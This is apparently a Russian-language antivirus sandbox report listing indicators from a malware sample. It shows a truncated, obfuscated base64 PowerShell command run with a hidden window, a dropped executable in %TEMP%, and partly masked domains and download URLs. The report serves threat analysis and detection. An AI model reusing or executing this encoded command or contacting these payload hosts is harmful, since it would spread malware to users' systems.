Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JgAgACgAIAAkAEUATgB2ADoAcAB1AGIATABpAEMAWwAxADMAXQArACQAZQBOAFYAOgBQAFUAYgBMAEkAQwBbADUAXQArACcAeAAnACkAKAAgAC0ASgBvAGkATgAgACgAIAAnADMANgBkADEAMQA5ACYAMQAxADUAOwA5ADkAJgAxADEANABLADEAMAA1AC...
- %TEMP%\45188.exe
- 'pi###tate.com':80
- 'cl###oms.com':80
- 'ke####reaves.com':80
- 'ke####reaves.com':443
- 'th####factory.ch':80
- 'th####factory.ch':443
- 'mo###izr.com':80
- 'ex#####freeresults.com':80
- http://cl###oms.com/vLgKtwmAL/
- http://ke####reaves.com/dR/
- http://th####factory.ch/oIRjunwQn/
- http://mo###izr.com/uGfDME/
- http://www.ex#####freeresults.com/?dn###################################
- 'ke####reaves.com':443
- 'th####factory.ch':443
- DNS ASK pi###tate.com
- DNS ASK cl###oms.com
- DNS ASK ke####reaves.com
- DNS ASK th####factory.ch
- DNS ASK mo###izr.com
- DNS ASK ex#####freeresults.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JgAgACgAIAAkAEUATgB2ADoAcAB1AGIATABpAEMAWwAxADMAXQArACQAZQBOAFYAOgBQAFUAYgBMAEkAQwBbADUAXQArACcAeAAnACkAKAAgAC0ASgBvAGkATgAgACgAIAAnADMANgBkADEAMQA5ACYAMQAxADUAOwA5ADkAJgAxADEANABLADEAMAA1AC...' (со скрытым окном)